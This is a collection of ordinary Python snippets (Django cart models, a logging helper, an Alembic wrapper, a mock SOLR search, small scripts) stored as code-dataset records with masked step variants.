pytest.allure.attach(name, self.format_message(message))\n\n @staticmethod\n def attach_png(name, message):\n pytest.allure.attach(name, message, type=AttachmentType.PNG)\n\n def attach_selenium_screenshot(self, attach_name, selenium_driver):\n if selenium_driver:\n try:\n close_popups(selenium_driver)\n self.debug('Attach screenshot')\n self.attach_png(attach_name, selenium_driver.get_screenshot_as_png())\n self.debug('...Done')\n except Exception as e:\n self.error('Cannot get screenshot from SeleniumWebDriver')\n pytest.allure.attach(attach_name, str(e))\n\n else:\n self.error('No browser is define')\n\n def add_handler(self, file_name, mode='a'):\n file_handler = logging.FileHandler(filename=file_name, mode=mode)\n file_handler.setFormatter(log_formatter)\n file_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))\n self.addHandler(file_handler)\n\n\ndef setup_logging():\n # Logging setup\n logger = CustomLogger('root')\n\n # Level of handler\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))\n # Create a method of message\n console_handler.setFormatter(log_formatter)\n logger.addHandler(console_handler)\n\n # Level of handler\n string_io = logging.StreamHandler(logger.test_log)\n string_io.setLevel(os.getenv('LOGGING_LEVEL', 'INFO'))\n # Create a method of message\n string_io.setFormatter(log_formatter)\n logger.addHandler(string_io)\n return logger\n\n\nlogger = setup_logging()\n", "step-ids": [ 10, 13, 14, 15, 16 ] }
[ 10, 13, 14, 15, 16 ]
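A short usage sketch for the CustomLogger module above, assuming it is saved as custom_logger.py (a hypothetical name) and its pytest/allure/utils.tools dependencies are importable; the attach_* calls only take effect inside an Allure-enabled test run:

from custom_logger import logger

logger.subdebug('fixture state: %s', {'step': 1})   # custom SUBDEBUG level (15)
logger.attach_info('request payload', {'id': 42})   # attaches pretty-printed JSON to the report
logger.add_handler('test_run.log')                  # hypothetical file name; mirrors records to a file
print(logger.test_log.getvalue())                   # everything captured by the StringIO handler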
from django.db import models
from home.models import MainUser
from product.models import Product

# Create your models here.
class Cart(models.Model):
    user = models.ForeignKey(MainUser, on_delete=models.CASCADE)
    item = models.ForeignKey(Product, on_delete=models.CASCADE)

    quantity = models.PositiveIntegerField(default=1)
    purchased = models.BooleanField(default=False)  # fixed spelling: was "parchased"

    created = models.DateTimeField(auto_now_add=True)
    updated = models.DateTimeField(auto_now=True)

    def __str__(self):
        return f'{self.item}x{self.quantity}'

    def get_total(self):
        total = self.item.price * self.quantity
        f_total = format(total, '0.2f')
        return f_total


class Order(models.Model):
    orderitems = models.ManyToManyField(Cart)
    user = models.ForeignKey(MainUser, on_delete=models.CASCADE)
    ordered = models.BooleanField(default=False)

    created = models.DateTimeField(auto_now_add=True)
    payment_id = models.CharField(max_length=300, blank=True, null=True)
    orderid = models.CharField(max_length=300, blank=True, null=True)
normal
{ "blob_id": "454d210c1b1a41e4a645ef7ccb24f80ee20a451c", "index": 2224, "step-1": "<mask token>\n\n\nclass Cart(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def get_total(self):\n total = self.item.price * self.quantity\n f_total = format(total, '0.2f')\n return f_total\n\n\nclass Order(models.Model):\n orderitems = models.ManyToManyField(Cart)\n user = models.ForeignKey(MainUser, on_delete=models.CASCADE)\n ordered = models.BooleanField(default=False)\n created = models.DateTimeField(auto_now_add=True)\n payment_id = models.CharField(max_length=300, blank=True, null=True)\n orderid = models.CharField(max_length=300, blank=True, null=True)\n", "step-2": "<mask token>\n\n\nclass Cart(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return f'{self.item}x{self.quantity}'\n\n def get_total(self):\n total = self.item.price * self.quantity\n f_total = format(total, '0.2f')\n return f_total\n\n\nclass Order(models.Model):\n orderitems = models.ManyToManyField(Cart)\n user = models.ForeignKey(MainUser, on_delete=models.CASCADE)\n ordered = models.BooleanField(default=False)\n created = models.DateTimeField(auto_now_add=True)\n payment_id = models.CharField(max_length=300, blank=True, null=True)\n orderid = models.CharField(max_length=300, blank=True, null=True)\n", "step-3": "<mask token>\n\n\nclass Cart(models.Model):\n user = models.ForeignKey(MainUser, on_delete=models.CASCADE)\n item = models.ForeignKey(Product, on_delete=models.CASCADE)\n quantity = models.PositiveIntegerField(default=1)\n parchased = models.BooleanField(default=False)\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return f'{self.item}x{self.quantity}'\n\n def get_total(self):\n total = self.item.price * self.quantity\n f_total = format(total, '0.2f')\n return f_total\n\n\nclass Order(models.Model):\n orderitems = models.ManyToManyField(Cart)\n user = models.ForeignKey(MainUser, on_delete=models.CASCADE)\n ordered = models.BooleanField(default=False)\n created = models.DateTimeField(auto_now_add=True)\n payment_id = models.CharField(max_length=300, blank=True, null=True)\n orderid = models.CharField(max_length=300, blank=True, null=True)\n", "step-4": "from django.db import models\nfrom home.models import MainUser\nfrom product.models import Product\n\n\nclass Cart(models.Model):\n user = models.ForeignKey(MainUser, on_delete=models.CASCADE)\n item = models.ForeignKey(Product, on_delete=models.CASCADE)\n quantity = models.PositiveIntegerField(default=1)\n parchased = models.BooleanField(default=False)\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return f'{self.item}x{self.quantity}'\n\n def get_total(self):\n total = self.item.price * self.quantity\n f_total = format(total, '0.2f')\n return f_total\n\n\nclass Order(models.Model):\n orderitems = models.ManyToManyField(Cart)\n user = models.ForeignKey(MainUser, on_delete=models.CASCADE)\n ordered = models.BooleanField(default=False)\n created = models.DateTimeField(auto_now_add=True)\n payment_id = models.CharField(max_length=300, blank=True, null=True)\n orderid = models.CharField(max_length=300, blank=True, null=True)\n", "step-5": "from django.db import models\nfrom home.models import MainUser\nfrom product.models import Product\n# Create your models here.\nclass 
Cart(models.Model):\n user = models.ForeignKey(MainUser,on_delete=models.CASCADE)\n item = models.ForeignKey(Product, on_delete=models.CASCADE)\n\n quantity = models.PositiveIntegerField(default=1)\n parchased=models.BooleanField(default=False)\n\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n \n\n def __str__(self):\n return f'{self.item}x{self.quantity}'\n\n\n def get_total(self):\n total=self.item.price *self.quantity \n f_total=format(total,'0.2f')\n return f_total\n \nclass Order(models.Model):\n orderitems = models.ManyToManyField(Cart)\n user=models.ForeignKey(MainUser,on_delete=models.CASCADE)\n ordered=models.BooleanField(default=False)\n\n created = models.DateTimeField(auto_now_add=True)\n payment_id=models.CharField(max_length=300,blank=True,null=True)\n orderid=models.CharField(max_length=300,blank=True,null=True)\n\n \n\n ", "step-ids": [ 4, 5, 6, 7, 8 ] }
[ 4, 5, 6, 7, 8 ]
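A short sketch of how Cart.get_total computes a line total, e.g. from python manage.py shell (the price value is made up, and the cart app label is hypothetical; a numeric Product.price field is implied by get_total itself):

from product.models import Product
from cart.models import Cart  # hypothetical app label for the models above

item = Product.objects.first()
item.price = 19.90
line = Cart(item=item, quantity=3)
print(line.get_total())  # '59.70' -- a string formatted to two decimal places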
def main(altura, largura, comprimento):
    piso = largura * comprimento                            # floor area
    volume_sala = largura * comprimento * altura            # room volume
    area = 2 * altura * largura + 2 * altura * comprimento  # wall area
    print(piso)
    print(volume_sala)
    print(area)


if __name__ == '__main__':
    # Read the dimensions and pass them in explicitly, instead of relying on
    # module-level globals defined after the function (and read at import time).
    altura = float(input(""))
    largura = float(input(""))
    comprimento = float(input(""))
    main(altura, largura, comprimento)
normal
{ "blob_id": "d78fd8ebf9ef55700a25a9ce96d9094f1bfa564e", "index": 6455, "step-1": "<mask token>\n", "step-2": "def main():\n piso = largura * comprimento\n volume_sala = largura * comprimento * altura\n area = 2 * altura * largura + 2 * altura * comprimento\n print(piso)\n print(volume_sala)\n print(area)\n\n\n<mask token>\n", "step-3": "def main():\n piso = largura * comprimento\n volume_sala = largura * comprimento * altura\n area = 2 * altura * largura + 2 * altura * comprimento\n print(piso)\n print(volume_sala)\n print(area)\n\n\n<mask token>\nif __name__ == '__main__':\n main()\n", "step-4": "def main():\n piso = largura * comprimento\n volume_sala = largura * comprimento * altura\n area = 2 * altura * largura + 2 * altura * comprimento\n print(piso)\n print(volume_sala)\n print(area)\n\n\naltura = float(input(''))\nlargura = float(input(''))\ncomprimento = float(input(''))\nif __name__ == '__main__':\n main()\n", "step-5": "def main():\n piso = largura * comprimento\n volume_sala = largura * comprimento * altura\n area = 2 * altura * largura + 2 * altura * comprimento\n print(piso)\n print(volume_sala)\n print(area)\n\naltura = float(input(\"\"))\nlargura = float(input(\"\"))\ncomprimento = float(input(\"\"))\n\nif __name__ == '__main__':\n main()\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
"""Wrapper over the command line migrate tool to better work with config files.""" import subprocess import sys from alembic.migration import MigrationContext from ..lib.alembic import bootstrap_db from ..lib.sqla import create_engine from ..models import DBSession as db def main(): if len(sys.argv) < 3: sys.stderr.write('Usage: %s CONFIG_URI {bootstrap | ALEMBIC_OPTS}\n' % sys.argv[0]) sys.exit(1) config_uri = sys.argv.pop(1) if sys.argv[1] == 'bootstrap': bootstrap_db(config_uri) else: engine = create_engine(config_uri) db.configure(bind=engine) context = MigrationContext.configure(engine.connect()) db_version = context.get_current_revision() if not db_version: sys.stderr.write('Database not initialized.\n' 'Try this: "sortie-db-manage %s bootstrap"\n' % config_uri) sys.exit(2) cmd = ['alembic', '-c', config_uri] + sys.argv[1:] print(subprocess.check_output(cmd))
normal
{ "blob_id": "7b459cf321f351e1485a9aef0ca23067f411e430", "index": 7446, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef main():\n if len(sys.argv) < 3:\n sys.stderr.write(\n 'Usage: %s CONFIG_URI {bootstrap | ALEMBIC_OPTS}\\n' % sys.argv[0])\n sys.exit(1)\n config_uri = sys.argv.pop(1)\n if sys.argv[1] == 'bootstrap':\n bootstrap_db(config_uri)\n else:\n engine = create_engine(config_uri)\n db.configure(bind=engine)\n context = MigrationContext.configure(engine.connect())\n db_version = context.get_current_revision()\n if not db_version:\n sys.stderr.write(\n \"\"\"Database not initialized.\nTry this: \"sortie-db-manage %s bootstrap\\\"\n\"\"\"\n % config_uri)\n sys.exit(2)\n cmd = ['alembic', '-c', config_uri] + sys.argv[1:]\n print(subprocess.check_output(cmd))\n", "step-3": "<mask token>\nimport subprocess\nimport sys\nfrom alembic.migration import MigrationContext\nfrom ..lib.alembic import bootstrap_db\nfrom ..lib.sqla import create_engine\nfrom ..models import DBSession as db\n\n\ndef main():\n if len(sys.argv) < 3:\n sys.stderr.write(\n 'Usage: %s CONFIG_URI {bootstrap | ALEMBIC_OPTS}\\n' % sys.argv[0])\n sys.exit(1)\n config_uri = sys.argv.pop(1)\n if sys.argv[1] == 'bootstrap':\n bootstrap_db(config_uri)\n else:\n engine = create_engine(config_uri)\n db.configure(bind=engine)\n context = MigrationContext.configure(engine.connect())\n db_version = context.get_current_revision()\n if not db_version:\n sys.stderr.write(\n \"\"\"Database not initialized.\nTry this: \"sortie-db-manage %s bootstrap\\\"\n\"\"\"\n % config_uri)\n sys.exit(2)\n cmd = ['alembic', '-c', config_uri] + sys.argv[1:]\n print(subprocess.check_output(cmd))\n", "step-4": "\"\"\"Wrapper over the command line migrate tool to better work with\nconfig files.\"\"\"\n\nimport subprocess\nimport sys\n\nfrom alembic.migration import MigrationContext\n\nfrom ..lib.alembic import bootstrap_db\nfrom ..lib.sqla import create_engine\nfrom ..models import DBSession as db\n\n\ndef main():\n if len(sys.argv) < 3:\n sys.stderr.write('Usage: %s CONFIG_URI {bootstrap | ALEMBIC_OPTS}\\n'\n % sys.argv[0])\n sys.exit(1)\n\n config_uri = sys.argv.pop(1)\n\n if sys.argv[1] == 'bootstrap':\n bootstrap_db(config_uri)\n else:\n engine = create_engine(config_uri)\n db.configure(bind=engine)\n context = MigrationContext.configure(engine.connect())\n db_version = context.get_current_revision()\n\n if not db_version:\n sys.stderr.write('Database not initialized.\\n'\n 'Try this: \"sortie-db-manage %s bootstrap\"\\n'\n % config_uri)\n sys.exit(2)\n\n cmd = ['alembic', '-c', config_uri] + sys.argv[1:]\n\n print(subprocess.check_output(cmd))\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
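Typical invocations of the wrapper above, assuming it is installed as the sortie-db-manage console script named in its own error message (development.ini is a hypothetical config file carrying the usual [alembic] section):

sortie-db-manage development.ini bootstrap         # initialize a fresh database
sortie-db-manage development.ini upgrade head      # remaining args are forwarded to alembic -c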
from locations.storefinders.stockinstore import StockInStoreSpider class ScooterHutAUSpider(StockInStoreSpider): name = "scooter_hut_au" item_attributes = {"brand": "Scooter Hut", "brand_wikidata": "Q117747623"} api_site_id = "10112" api_widget_id = "119" api_widget_type = "product" api_origin = "https://scooterhut.com.au"
normal
{ "blob_id": "e37f4422c1063df50453f7abf72a0a9a31156d8b", "index": 899, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass ScooterHutAUSpider(StockInStoreSpider):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass ScooterHutAUSpider(StockInStoreSpider):\n name = 'scooter_hut_au'\n item_attributes = {'brand': 'Scooter Hut', 'brand_wikidata': 'Q117747623'}\n api_site_id = '10112'\n api_widget_id = '119'\n api_widget_type = 'product'\n api_origin = 'https://scooterhut.com.au'\n", "step-4": "from locations.storefinders.stockinstore import StockInStoreSpider\n\n\nclass ScooterHutAUSpider(StockInStoreSpider):\n name = 'scooter_hut_au'\n item_attributes = {'brand': 'Scooter Hut', 'brand_wikidata': 'Q117747623'}\n api_site_id = '10112'\n api_widget_id = '119'\n api_widget_type = 'product'\n api_origin = 'https://scooterhut.com.au'\n", "step-5": "from locations.storefinders.stockinstore import StockInStoreSpider\n\n\nclass ScooterHutAUSpider(StockInStoreSpider):\n name = \"scooter_hut_au\"\n item_attributes = {\"brand\": \"Scooter Hut\", \"brand_wikidata\": \"Q117747623\"}\n api_site_id = \"10112\"\n api_widget_id = \"119\"\n api_widget_type = \"product\"\n api_origin = \"https://scooterhut.com.au\"\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
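The row above is a Scrapy store-finder spider; under standard Scrapy conventions it is run by its name attribute (the output file name is just an example):

scrapy crawl scooter_hut_au -o scooter_hut_au.json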
import shlex class MockSOLR(object): class MockHits(list): @property def hits(self): return len(self) @property def docs(self): return self def __init__(self): self.db = {} def add(self, objects): for o in objects: o['text'] = ''.join(o['text']) self.db[o['id']] = o def commit(self): pass def search(self, q, fq=None, **kw): if isinstance(q, unicode): q = q.encode('latin-1') # Parse query preds = [] q_parts = shlex.split(q) if fq: q_parts += fq for part in q_parts: if part == '&&': continue if ':' in part: field, value = part.split(':', 1) preds.append((field, value)) else: preds.append(('text', part)) result = self.MockHits() for obj in self.db.values(): for field, value in preds: neg = False if field[0] == '!': neg = True field = field[1:] if field == 'text' or field.endswith('_t'): if (value not in str(obj.get(field, ''))) ^ neg: break else: if (value != str(obj.get(field, ''))) ^ neg: break else: result.append(obj) return result def delete(self, *args, **kwargs): if kwargs.get('q', None) == '*:*': self.db = {} elif kwargs.get('id', None): del self.db[kwargs['id']] elif kwargs.get('q', None): for doc in self.search(kwargs['q']): self.delete(id=doc['id'])
normal
{ "blob_id": "4774c1f4eafc0132bab0073b60c4bcad6b69380d", "index": 9068, "step-1": "<mask token>\n\n\nclass MockSOLR(object):\n\n\n class MockHits(list):\n\n @property\n def hits(self):\n return len(self)\n\n @property\n def docs(self):\n return self\n <mask token>\n <mask token>\n <mask token>\n\n def search(self, q, fq=None, **kw):\n if isinstance(q, unicode):\n q = q.encode('latin-1')\n preds = []\n q_parts = shlex.split(q)\n if fq:\n q_parts += fq\n for part in q_parts:\n if part == '&&':\n continue\n if ':' in part:\n field, value = part.split(':', 1)\n preds.append((field, value))\n else:\n preds.append(('text', part))\n result = self.MockHits()\n for obj in self.db.values():\n for field, value in preds:\n neg = False\n if field[0] == '!':\n neg = True\n field = field[1:]\n if field == 'text' or field.endswith('_t'):\n if (value not in str(obj.get(field, ''))) ^ neg:\n break\n elif (value != str(obj.get(field, ''))) ^ neg:\n break\n else:\n result.append(obj)\n return result\n\n def delete(self, *args, **kwargs):\n if kwargs.get('q', None) == '*:*':\n self.db = {}\n elif kwargs.get('id', None):\n del self.db[kwargs['id']]\n elif kwargs.get('q', None):\n for doc in self.search(kwargs['q']):\n self.delete(id=doc['id'])\n", "step-2": "<mask token>\n\n\nclass MockSOLR(object):\n\n\n class MockHits(list):\n\n @property\n def hits(self):\n return len(self)\n\n @property\n def docs(self):\n return self\n\n def __init__(self):\n self.db = {}\n\n def add(self, objects):\n for o in objects:\n o['text'] = ''.join(o['text'])\n self.db[o['id']] = o\n <mask token>\n\n def search(self, q, fq=None, **kw):\n if isinstance(q, unicode):\n q = q.encode('latin-1')\n preds = []\n q_parts = shlex.split(q)\n if fq:\n q_parts += fq\n for part in q_parts:\n if part == '&&':\n continue\n if ':' in part:\n field, value = part.split(':', 1)\n preds.append((field, value))\n else:\n preds.append(('text', part))\n result = self.MockHits()\n for obj in self.db.values():\n for field, value in preds:\n neg = False\n if field[0] == '!':\n neg = True\n field = field[1:]\n if field == 'text' or field.endswith('_t'):\n if (value not in str(obj.get(field, ''))) ^ neg:\n break\n elif (value != str(obj.get(field, ''))) ^ neg:\n break\n else:\n result.append(obj)\n return result\n\n def delete(self, *args, **kwargs):\n if kwargs.get('q', None) == '*:*':\n self.db = {}\n elif kwargs.get('id', None):\n del self.db[kwargs['id']]\n elif kwargs.get('q', None):\n for doc in self.search(kwargs['q']):\n self.delete(id=doc['id'])\n", "step-3": "<mask token>\n\n\nclass MockSOLR(object):\n\n\n class MockHits(list):\n\n @property\n def hits(self):\n return len(self)\n\n @property\n def docs(self):\n return self\n\n def __init__(self):\n self.db = {}\n\n def add(self, objects):\n for o in objects:\n o['text'] = ''.join(o['text'])\n self.db[o['id']] = o\n\n def commit(self):\n pass\n\n def search(self, q, fq=None, **kw):\n if isinstance(q, unicode):\n q = q.encode('latin-1')\n preds = []\n q_parts = shlex.split(q)\n if fq:\n q_parts += fq\n for part in q_parts:\n if part == '&&':\n continue\n if ':' in part:\n field, value = part.split(':', 1)\n preds.append((field, value))\n else:\n preds.append(('text', part))\n result = self.MockHits()\n for obj in self.db.values():\n for field, value in preds:\n neg = False\n if field[0] == '!':\n neg = True\n field = field[1:]\n if field == 'text' or field.endswith('_t'):\n if (value not in str(obj.get(field, ''))) ^ neg:\n break\n elif (value != str(obj.get(field, ''))) ^ neg:\n break\n else:\n 
result.append(obj)\n return result\n\n def delete(self, *args, **kwargs):\n if kwargs.get('q', None) == '*:*':\n self.db = {}\n elif kwargs.get('id', None):\n del self.db[kwargs['id']]\n elif kwargs.get('q', None):\n for doc in self.search(kwargs['q']):\n self.delete(id=doc['id'])\n", "step-4": "import shlex\n\n\nclass MockSOLR(object):\n\n\n class MockHits(list):\n\n @property\n def hits(self):\n return len(self)\n\n @property\n def docs(self):\n return self\n\n def __init__(self):\n self.db = {}\n\n def add(self, objects):\n for o in objects:\n o['text'] = ''.join(o['text'])\n self.db[o['id']] = o\n\n def commit(self):\n pass\n\n def search(self, q, fq=None, **kw):\n if isinstance(q, unicode):\n q = q.encode('latin-1')\n preds = []\n q_parts = shlex.split(q)\n if fq:\n q_parts += fq\n for part in q_parts:\n if part == '&&':\n continue\n if ':' in part:\n field, value = part.split(':', 1)\n preds.append((field, value))\n else:\n preds.append(('text', part))\n result = self.MockHits()\n for obj in self.db.values():\n for field, value in preds:\n neg = False\n if field[0] == '!':\n neg = True\n field = field[1:]\n if field == 'text' or field.endswith('_t'):\n if (value not in str(obj.get(field, ''))) ^ neg:\n break\n elif (value != str(obj.get(field, ''))) ^ neg:\n break\n else:\n result.append(obj)\n return result\n\n def delete(self, *args, **kwargs):\n if kwargs.get('q', None) == '*:*':\n self.db = {}\n elif kwargs.get('id', None):\n del self.db[kwargs['id']]\n elif kwargs.get('q', None):\n for doc in self.search(kwargs['q']):\n self.delete(id=doc['id'])\n", "step-5": "import shlex\n\n\nclass MockSOLR(object):\n\n class MockHits(list):\n @property\n def hits(self):\n return len(self)\n\n @property\n def docs(self):\n return self\n\n def __init__(self):\n self.db = {}\n\n def add(self, objects):\n for o in objects:\n o['text'] = ''.join(o['text'])\n self.db[o['id']] = o\n\n def commit(self):\n pass\n\n def search(self, q, fq=None, **kw):\n if isinstance(q, unicode):\n q = q.encode('latin-1')\n # Parse query\n preds = []\n q_parts = shlex.split(q)\n if fq:\n q_parts += fq\n for part in q_parts:\n if part == '&&':\n continue\n if ':' in part:\n field, value = part.split(':', 1)\n preds.append((field, value))\n else:\n preds.append(('text', part))\n result = self.MockHits()\n for obj in self.db.values():\n for field, value in preds:\n neg = False\n if field[0] == '!':\n neg = True\n field = field[1:]\n if field == 'text' or field.endswith('_t'):\n if (value not in str(obj.get(field, ''))) ^ neg:\n break\n else:\n if (value != str(obj.get(field, ''))) ^ neg:\n break\n else:\n result.append(obj)\n return result\n\n def delete(self, *args, **kwargs):\n if kwargs.get('q', None) == '*:*':\n self.db = {}\n elif kwargs.get('id', None):\n del self.db[kwargs['id']]\n elif kwargs.get('q', None):\n for doc in self.search(kwargs['q']):\n self.delete(id=doc['id'])\n", "step-ids": [ 3, 5, 6, 7, 8 ] }
[ 3, 5, 6, 7, 8 ]
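A small usage sketch for the MockSOLR row above (note the snippet is Python 2 code, since it references the unicode builtin; the documents are made up):

solr = MockSOLR()
solr.add([{'id': '1', 'title_t': 'first post', 'text': ['hello world']}])
solr.add([{'id': '2', 'title_t': 'second', 'text': ['goodbye']}])
results = solr.search('text:hello')
print results.hits, [doc['id'] for doc in results.docs]  # 1 ['1']
solr.delete(q='*:*')  # empties the mock index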
import xlrd


def open_excel(file='D:\基金公司\数据库-制表符\资产组合-基金公司维度.xlsx'):
    try:
        # Use the argument instead of re-hardcoding the path
        data = xlrd.open_workbook(file)
        return data
    except Exception as e:
        print(str(e))


def excel_table_byindex(file='D:\基金公司\数据库-制表符\资产组合-基金公司维度.xlsx', colnameindex=0, by_index=0):
    data = open_excel(file)
    table = data.sheets()[by_index]
    nrows = table.nrows
    colnames = table.row_values(colnameindex)  # header row
    rows = []
    for rownum in range(1, nrows):
        row = table.row_values(rownum)
        if row:
            app = {}
            for i in range(len(colnames)):
                app[colnames[i]] = row[i]
            rows.append(app)  # fixed typo: was list.apend(app), which raised AttributeError
    return rows
normal
{ "blob_id": "d211594a034489d36a5648bf0b926fbd734fd0df", "index": 6928, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef excel_table_byindex(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx',\n colnameindex=0, by_index=0):\n data = open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n table = data.sheets()[by_index]\n nrows = table.nrows\n ncols = table.ncols\n colnames = table.row_values(colnameindex)\n list = []\n for rownum in range(1, nrows):\n row = table.row_values(rownum)\n if row:\n app = {}\n for i in range(len(colnames)):\n app[colnames[i]] = row[i]\n list.apend(app)\n return list\n", "step-3": "<mask token>\n\n\ndef open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx'):\n try:\n data = xlrd.open_workbook('D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n return data\n except Exception as e:\n print(str(e))\n\n\ndef excel_table_byindex(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx',\n colnameindex=0, by_index=0):\n data = open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n table = data.sheets()[by_index]\n nrows = table.nrows\n ncols = table.ncols\n colnames = table.row_values(colnameindex)\n list = []\n for rownum in range(1, nrows):\n row = table.row_values(rownum)\n if row:\n app = {}\n for i in range(len(colnames)):\n app[colnames[i]] = row[i]\n list.apend(app)\n return list\n", "step-4": "import xdrlib, sys\nimport xlrd\n\n\ndef open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx'):\n try:\n data = xlrd.open_workbook('D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n return data\n except Exception as e:\n print(str(e))\n\n\ndef excel_table_byindex(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx',\n colnameindex=0, by_index=0):\n data = open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n table = data.sheets()[by_index]\n nrows = table.nrows\n ncols = table.ncols\n colnames = table.row_values(colnameindex)\n list = []\n for rownum in range(1, nrows):\n row = table.row_values(rownum)\n if row:\n app = {}\n for i in range(len(colnames)):\n app[colnames[i]] = row[i]\n list.apend(app)\n return list\n", "step-5": "import xdrlib,sys\nimport xlrd\ndef open_excel(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx'):\n try:\n data=xlrd.open_workbook('D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx')\n return data\n except Exception as e:\n print (str(e))\ndef excel_table_byindex(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx',colnameindex=0,by_index=0):\n data=open_excel(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx')\n table=data.sheets()[by_index]\n nrows=table.nrows\n ncols=table.ncols\n colnames=table.row_values(colnameindex)\n list=[]\n for rownum in range(1,nrows):\n row=table.row_values(rownum)\n if row:\n app={}\n for i in range(len(colnames)):\n app[colnames[i]]=row[i]\n list.apend(app)\n return list\n\n\n\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
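Usage sketch for the reader above (the workbook name is hypothetical; note that xlrd 2.0+ dropped .xlsx support, so this assumes xlrd < 2.0 or an .xls workbook):

rows = excel_table_byindex(file='portfolio.xlsx', colnameindex=0, by_index=0)
for record in rows[:3]:
    print(record)  # each data row becomes a {column name: cell value} dict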
# Assumes ZooAnnouncerInterface.py defines a class of the same name; importing the
# bare module and subclassing it (as the original did) raises a TypeError.
from ZooAnnouncerInterface import ZooAnnouncerInterface


class ZooAnnouncer(ZooAnnouncerInterface):
    def updateZoo(self, announcement):
        print("ZooAnnouncer :" + announcement)
normal
{ "blob_id": "be9c21ee04a612f711a1e6a82ea9478c77b62a82", "index": 8112, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass ZooAnnouncer(ZooAnnouncerInterface):\n <mask token>\n", "step-3": "<mask token>\n\n\nclass ZooAnnouncer(ZooAnnouncerInterface):\n\n def updateZoo(self, annoucement):\n print('ZooAnnouncer :' + annoucement)\n", "step-4": "import ZooAnnouncerInterface\n\n\nclass ZooAnnouncer(ZooAnnouncerInterface):\n\n def updateZoo(self, annoucement):\n print('ZooAnnouncer :' + annoucement)\n", "step-5": "import ZooAnnouncerInterface\n\nclass ZooAnnouncer(ZooAnnouncerInterface):\n def updateZoo(self,annoucement):\n print(\"ZooAnnouncer :\" + annoucement)", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
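A one-line usage sketch for the observer above, assuming ZooAnnouncerInterface is directly subclass-instantiable (the announcement text is made up):

ZooAnnouncer().updateZoo("Feeding time at the lion enclosure")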
# -*- coding:utf-8 -*-
'''
Created on 2016-04-08

@author: liping
'''

import sys
from PyQt4 import QtGui, QtCore


class QuitButton(QtGui.QWidget):
    def __init__(self, parent=None):
        QtGui.QWidget.__init__(self, parent)

        self.setGeometry(300, 300, 250, 150)
        self.setWindowTitle('quitButton')

        quit = QtGui.QPushButton('Close', self)
        quit.setGeometry(100, 100, 60, 35)

        self.connect(quit, QtCore.SIGNAL('clicked()'), QtGui.qApp, QtCore.SLOT('quit()'))


app = QtGui.QApplication(sys.argv)
qb = QuitButton()
qb.show()
sys.exit(app.exec_())
normal
{ "blob_id": "5a3431b79b8f42b3042bb27d787d0d92891a7415", "index": 3947, "step-1": "<mask token>\n\n\nclass QuitButton(QtGui.QWidget):\n <mask token>\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass QuitButton(QtGui.QWidget):\n\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent)\n self.setGeometry(300, 300, 250, 150)\n self.setWindowTitle('quitButton')\n quit = QtGui.QPushButton('Close', self)\n quit.setGeometry(100, 100, 60, 35)\n self.connect(quit, QtCore.SIGNAL('clicked()'), QtGui.qApp, QtCore.\n SLOT('quit()'))\n\n\n<mask token>\nqb.show()\nsys.exit(app.exec_())\n", "step-3": "<mask token>\n\n\nclass QuitButton(QtGui.QWidget):\n\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent)\n self.setGeometry(300, 300, 250, 150)\n self.setWindowTitle('quitButton')\n quit = QtGui.QPushButton('Close', self)\n quit.setGeometry(100, 100, 60, 35)\n self.connect(quit, QtCore.SIGNAL('clicked()'), QtGui.qApp, QtCore.\n SLOT('quit()'))\n\n\napp = QtGui.QApplication(sys.argv)\nqb = QuitButton()\nqb.show()\nsys.exit(app.exec_())\n", "step-4": "<mask token>\nimport sys\nfrom PyQt4 import QtGui, QtCore\n\n\nclass QuitButton(QtGui.QWidget):\n\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent)\n self.setGeometry(300, 300, 250, 150)\n self.setWindowTitle('quitButton')\n quit = QtGui.QPushButton('Close', self)\n quit.setGeometry(100, 100, 60, 35)\n self.connect(quit, 